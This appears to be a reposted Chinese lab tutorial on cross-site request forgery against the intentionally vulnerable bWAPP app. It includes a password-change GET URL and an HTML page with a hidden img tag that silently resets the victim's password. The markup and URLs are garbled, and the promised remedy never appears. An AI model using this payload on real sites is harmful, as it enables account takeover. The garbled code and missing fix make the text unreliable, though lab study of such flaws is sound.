本文向您介绍如何分析CSRF漏洞。内容非常详细。有兴趣的朋友可以参考一下,希望对你有帮助。
CSRF:跨站点请求伪造,伪装成用户身份执行一些非用户自愿的恶意非法操作。
CSRF和XSS的区别:
1.CSRF登录后需要操作,但XSS不需要。
2.CSRF通过伪装成可信用户来请求可信网站。
一、环境:BWAPP
第二,登录,默认账号是bee,密码是bug。
3.从csrf中的页面选择将密码更改为1111,更改。
第四,分析网址
http://192 . 168 . 1 . 119/bwapp/csrf _ 1 . PHP?password _ new=1111 password _ conf=1111 action=change
5.注销帐户,然后再次登录。密码已更改为1111。
6.修改网址,直接访问这个地址。
http://192 . 168 . 1 . 119/bwapp/csrf _ 1 . PHP?password _ new=2222 password _ conf=2222 action=change
密码被重置为2222。
七、隐蔽使用
1.创建一个新的html页面,再次修改url地址,并将其添加到img标签下的src属性中。
!DOCTYPE html html标题标题哦,那就好。/title /head body h3好久不见h3img src=' http://192 . 168 . 1 . 119/bwapp/csrf _ 1.php?password _ new=3333 password _ conf=3333 action=change '/body/html
2.访问这个html,自动访问修改后的url,密码自动修改。
我希望在这里分享如何解决CSRF的弱点。
内容来源网络,如有侵权,联系删除,本文地址:https://www.230890.com/zhan/140993.html